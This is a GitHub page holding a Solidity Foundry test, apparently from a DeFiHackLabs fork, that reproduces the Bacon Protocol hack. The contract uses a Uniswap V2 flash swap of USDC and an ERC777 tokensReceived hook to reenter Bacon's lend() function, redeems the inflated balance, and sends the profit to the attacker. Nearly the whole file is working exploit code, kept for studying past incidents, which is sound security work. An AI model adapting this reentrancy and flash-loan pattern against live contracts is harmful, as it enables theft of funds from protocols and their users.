forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Bacon_exp.sol
68 lines (60 loc) · 1.94 KB
/
Bacon_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./interface.sol";
contract ContractTest is DSTest {
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IUniswapV2Pair pair =
IUniswapV2Pair(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc);
IERC20 usdc = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
IBacon bacon = IBacon(0xb8919522331C59f5C16bDfAA6A121a6E03A91F62);
uint256 count = 0;
constructor() {
cheats.createSelectFork("mainnet", 14326931); // fork mainnet at block 14326931
ERC1820Registry(0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24)
.setInterfaceImplementer(
address(this),
bytes32(
0xb281fc8c12954d22544db45de3159a39272895b169a852b314f9cc762e44c53b
),
address(this)
);
}
function test() public {
emit log_named_uint(
"Before exploit, USDC balance of attacker:",
usdc.balanceOf(msg.sender)
);
pair.swap(6360000000000, 0, address(this), new bytes(1));
emit log_named_uint(
"After exploit, USDC balance of attacker:",
usdc.balanceOf(msg.sender)
);
}
function uniswapV2Call(
address sender,
uint256 amount0,
uint256 amount1,
bytes calldata data
) public {
usdc.approve(address(bacon), 10000000000000000000);
bacon.lend(2120000000000);
bacon.redeem(bacon.balanceOf(address(this)));
usdc.transfer(msg.sender, ((amount0 / 997) * 1000) + 10**usdc.decimals());
usdc.transfer(tx.origin, usdc.balanceOf(address(this)));
}
function tokensReceived(
address operator,
address from,
address to,
uint256 amount,
bytes calldata data,
bytes calldata operatorData
) public {
count += 1;
if (count <= 2) {
bacon.lend(2120000000000);
}
}
}